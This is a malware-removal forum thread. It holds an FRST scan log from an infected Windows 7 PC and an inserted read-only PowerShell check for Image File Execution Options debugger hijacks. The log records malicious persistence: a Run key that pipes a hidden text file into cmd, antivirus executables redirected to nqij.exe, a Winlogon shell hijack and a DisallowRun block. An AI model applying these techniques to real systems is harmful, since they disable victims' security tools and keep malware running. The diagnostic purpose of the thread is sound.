Inactive-A Cannot install Malwarebytes, Access to destination is denied


Bruce Betts

TS Rookie
I think my computer is infected. I've been getting errors when I install Malwarebytes and other programs. I also can't install any other antivirus software.
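Editor's note, added to this thread and not part of any post in it: the FRST log pasted further down lists dozens of entries of the form `IFEO\mbam.exe: [Debugger] nqij.exe` covering Malwarebytes, Avast, AVG, Kaspersky, Microsoft Security Essentials, Spybot, ComboFix and others, plus `Policies\Explorer\DisallowRun: [1] mrt.exe` for the current user. Under Image File Execution Options, Windows launches the value named in Debugger in place of the target image, so every attempt to start mbam.exe becomes an attempt to start nqij.exe; if that file is not on disk the launch fails, which is exactly the "cannot install or run antivirus" symptom described above. The PowerShell below is my own read-only check, not code from FRST, Malwarebytes or anyone in this thread. It assumes an elevated prompt on the affected machine and PowerShell 3 or later (Windows 7 ships with 2.0 and needs the WMF update); the rule that only a validly Microsoft-signed debugger is benign is my heuristic, and it will also list the `KMS-R@1nHook.exe` entries on SppSvc.exe and OSPPSVC.EXE that the same log shows.

```powershell
# Added example by the editor; not code from this thread, from FRST or from Malwarebytes.
# Read-only triage of two blocks seen in the FRST log:
#   1. Image File Execution Options (IFEO) "Debugger" values. Windows runs the named
#      debugger in place of the target image, so "IFEO\mbam.exe: [Debugger] nqij.exe"
#      means every launch of mbam.exe becomes a launch of nqij.exe. If nqij.exe is not
#      on disk the launch simply fails, which is how an AV install gets "blocked".
#   2. Explorer's per-user DisallowRun list (the log shows "[1] mrt.exe").
# Assumption: run from an elevated PowerShell 3+ prompt on the affected machine.

$IfeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

function Resolve-DebuggerImage([string]$DebuggerValue) {
    # The value may carry arguments; the first token is the debugger image.
    # A bare name such as nqij.exe is looked up on PATH here (the system
    # directories that CreateProcess also searches are on PATH by default).
    $image = ($DebuggerValue.Trim() -split '\s+')[0].Trim('"')
    if (Test-Path -LiteralPath $image -PathType Leaf) {
        return (Resolve-Path -LiteralPath $image).Path
    }
    $cmd = Get-Command -Name $image -CommandType Application -ErrorAction SilentlyContinue |
        Select-Object -First 1
    if ($cmd) { return $cmd.Source }
    return $null
}

function Get-IfeoDebuggerEntries {
    foreach ($root in $IfeoRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $root) {
            $dbg = $key.GetValue('Debugger')
            if ([string]::IsNullOrWhiteSpace($dbg)) { continue }

            $resolved = Resolve-DebuggerImage $dbg
            $status = 'FileMissing'
            $signer = ''
            if ($resolved) {
                $sig = Get-AuthenticodeSignature -FilePath $resolved
                $status = [string]$sig.Status
                if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            }

            # Editor's heuristic: a debugger that is missing, unsigned, or not signed by
            # Microsoft is treated as a hijack until a human says otherwise.
            [pscustomobject]@{
                Hive       = if ($root -like '*WOW6432Node*') { 'HKLM-x32' } else { 'HKLM' }
                Target     = $key.PSChildName
                Debugger   = $dbg
                Resolved   = if ($resolved) { $resolved } else { '<not found>' }
                Signature  = $status
                Signer     = $signer
                Suspicious = (-not $resolved) -or ($status -ne 'Valid') -or
                             ($signer -notmatch 'O=Microsoft Corporation')
            }
        }
    }
}

function Get-DisallowRunEntries {
    # With DisallowRun = 1, each value under the DisallowRun subkey names an
    # image the shell refuses to start for this user.
    $pol  = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    $list = Join-Path -Path $pol -ChildPath 'DisallowRun'
    $enabled = (Get-ItemProperty -LiteralPath $pol -Name DisallowRun -ErrorAction SilentlyContinue).DisallowRun
    if ($enabled -ne 1 -or -not (Test-Path -LiteralPath $list)) { return }
    $k = Get-Item -LiteralPath $list
    foreach ($name in $k.GetValueNames()) {
        [pscustomobject]@{ Index = $name; Blocked = $k.GetValue($name) }
    }
}

Get-IfeoDebuggerEntries | Where-Object Suspicious |
    Format-Table Hive, Target, Debugger, Resolved, Signature -AutoSize
Get-DisallowRunEntries | Format-Table -AutoSize
```

On a machine in the state the log describes, every nqij.exe entry should come back as `<not found>` with Signature `FileMissing`, and DisallowRun should list mrt.exe. The script changes nothing; in this thread the actual removal is done through the helper's FRST fixlist, and a debugger that resolves to a validly signed non-Microsoft file deserves a look before anyone deletes it, since a few legitimate tools register themselves this way.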
 

Broni

Malware Annihilator
Welcome aboard


Please complete all the steps listed here: https://www.techspot.com/community/topics/updated-4-step-viruses-spyware-malware-removal-preliminary-instructions.58138/
Make sure you PASTE all logs. If a log exceeds the 50,000-character post limit, split it between a couple of replies.
Attached logs won't be reviewed.

Please observe the following rules:
  • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
  • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer's behavior, good or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
 

Broni

Malware Annihilator
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24.10.2018
Ran by Betts (administrator) on BETTS-PC (01-11-2018 13:17:57)
Running from C:\Users\Betts\Desktop
Loaded Profiles: Betts (Available Profiles: Betts)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Garena Online ) C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\gxxsvc.exe
(Arcai.com) C:\Program Files (x86)\arcai.com\aips.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
() C:\Windows\KMS-R@1n.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\System Update\UpdateCenterService.exe
() C:\Windows\SysWOW64\Windows Server\wserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\arcai.com\netcut_windows.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Viber Media S.à r.l.) C:\Users\Betts\AppData\Local\Viber\Viber.exe
(I-Funbox.com) C:\Program Files (x86)\I-Funbox DevTeam\iFunBox_x64.exe
(Microsoft Corporation) C:\ProgramData\audio.exe
() C:\Users\Betts\AppData\Local\Temp\svchost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Autodesk Sync] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [6879fe793de5f826544fc9bd3b3ae212] => C:\ProgramData\audio.exe .. [285184 2018-08-22] (Microsoft Corporation)
HKLM-x32\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKLM\...\Policies\Explorer: [NoAutorun] 1
HKLM\...\Policies\Explorer: [NoViewOnDrive] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\...\Policies\Explorer: [NoViewContextMenu] 0
HKLM\...\Policies\Explorer: [NoShellSearchButton] 0
HKLM\...\Policies\Explorer: [NoFind] 0
HKLM\...\Policies\Explorer: [NoFile] 0
HKLM\...\Policies\Explorer: [HideClock] 0
HKLM\...\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\...\Policies\Explorer: [NoSetFolders] 0
HKLM\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\...\Policies\Explorer: [NoSetTaskbar] 0
HKLM\...\Policies\Explorer: [NoDeletePrinter] 0
HKLM\...\Policies\Explorer: [NoDFSTab] 0
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\...\Policies\Explorer: [NoLogoff] 0
HKLM\...\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\...\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 0
HKLM\...\Policies\Explorer: [NoSaveSettings] 0
HKLM\...\Policies\Explorer: [NoHardwareTab] 0
HKLM\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\...\Policies\Explorer: [NoDesktop] 0
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-19\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-19\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-19\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-19\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-20\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-20\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-20\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-20\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-20\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [csrss] => cmd /c type C:\Users\Betts\AppData\Local\Temp\csrss.txt | cmd <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8894680 2016-08-06] (Piriform Ltd)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Viber] => C:\Users\Betts\AppData\Local\Viber\Viber.exe [35581000 2018-01-30] (Viber Media S.à r.l.)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Steam] => D:\steam\steam.exe [3208992 2018-10-13] (Valve Corporation)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [iFunBox] => C:\Program Files (x86)\I-Funbox DevTeam\iFunBox_x64.exe [2992248 2016-09-21] (I-Funbox.com)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Spotify] => C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe [25162472 2018-10-24] (Spotify Ltd)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Blogger] => C:\ProgramData\Blogger\Blogger.exe [1078784 2018-08-22] ()
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [6879fe793de5f826544fc9bd3b3ae212] => C:\ProgramData\audio.exe .. [285184 2018-08-22] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: []
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer\DisallowRun: [1] mrt.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\msanis.exe <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\MountPoints2: {7f7bd46c-632b-11e3-acad-c8600099836d} - F:\bootstrap.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Winlogon: [Shell] explorer.exe,"C:\Windows\SysWOW64\Windows Server\wserver.exe" <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\SysWOW64\lol.scr
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-18\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-18\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-18\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-18\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-18\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoStartMenuSubFolders] 0
IFEO\AvastSvc.exe: [Debugger] nqij.exe
IFEO\AvastUI.exe: [Debugger] nqij.exe
IFEO\avcenter.exe: [Debugger] nqij.exe
IFEO\avconfig.exe: [Debugger] nqij.exe
IFEO\avgcsrvx.exe: [Debugger] nqij.exe
IFEO\avgidsagent.exe: [Debugger] nqij.exe
IFEO\avgnt.exe: [Debugger] nqij.exe
IFEO\avgrsx.exe: [Debugger] nqij.exe
IFEO\avguard.exe: [Debugger] nqij.exe
IFEO\avgui.exe: [Debugger] nqij.exe
IFEO\avgwdsvc.exe: [Debugger] nqij.exe
IFEO\avp.exe: [Debugger] nqij.exe
IFEO\avscan.exe: [Debugger] nqij.exe
IFEO\bdagent.exe: [Debugger] nqij.exe
IFEO\blindman.exe: [Debugger] nqij.exe
IFEO\ccuac.exe: [Debugger] nqij.exe
IFEO\ComboFix.exe: [Debugger] nqij.exe
IFEO\egui.exe: [Debugger] nqij.exe
IFEO\hijackthis.exe: [Debugger] nqij.exe
IFEO\instup.exe: [Debugger] nqij.exe
IFEO\keyscrambler.exe: [Debugger] nqij.exe
IFEO\mbam.exe: [Debugger] nqij.exe
IFEO\mbamgui.exe: [Debugger] nqij.exe
IFEO\mbampt.exe: [Debugger] nqij.exe
IFEO\mbamscheduler.exe: [Debugger] nqij.exe
IFEO\mbamservice.exe: [Debugger] nqij.exe
IFEO\MpCmdRun.exe: [Debugger] nqij.exe
IFEO\MSASCui.exe: [Debugger] nqij.exe
IFEO\MsMpEng.exe: [Debugger] nqij.exe
IFEO\msseces.exe: [Debugger] nqij.exe
IFEO\OSPPSVC.EXE: [Debugger] KMS-R@1nHook.exe
IFEO\rstrui.exe: [Debugger] nqij.exe
IFEO\SDFiles.exe: [Debugger] nqij.exe
IFEO\SDMain.exe: [Debugger] nqij.exe
IFEO\SDWinSec.exe: [Debugger] nqij.exe
IFEO\SppSvc.exe: [Debugger] KMS-R@1nHook.exe
IFEO\spybotsd.exe: [Debugger] nqij.exe
IFEO\wireshark.exe: [Debugger] nqij.exe
IFEO\zlclient.exe: [Debugger] nqij.exe
ShellExecuteHooks: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
ShellExecuteHooks-x32: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinUrl.url -> URL: file:///C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe [2018-08-22] ()
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe [2018-11-01] () <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 114.108.195.1 114.108.193.201
Tcpip\..\Interfaces\{C16676BF-0081-46CD-859D-0D985D72397E}: [DhcpNameServer] 114.108.195.1 114.108.193.201

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.apusx.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.apusx.com
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://ph.msn.com/?rd=1&ucc=PH&dcc=PH&opt=0&ocid=iehp
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000 -> {52300438-2215-426A-8181-FB18E65B2D4A} URL = hxxp://q.search-simple.com/?affID=na&q={searchTerms}&r=363
SearchScopes: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2014-11-12] (Microsoft Corporation)
BHO: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-21] (Microsoft Corporation)
BHO: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files\Common Files\Webroot\WebFiltering\wrflt.dll [2017-12-07] (Webroot)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2014-11-12] (Microsoft Corporation)
BHO-x32: No Name -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> No File
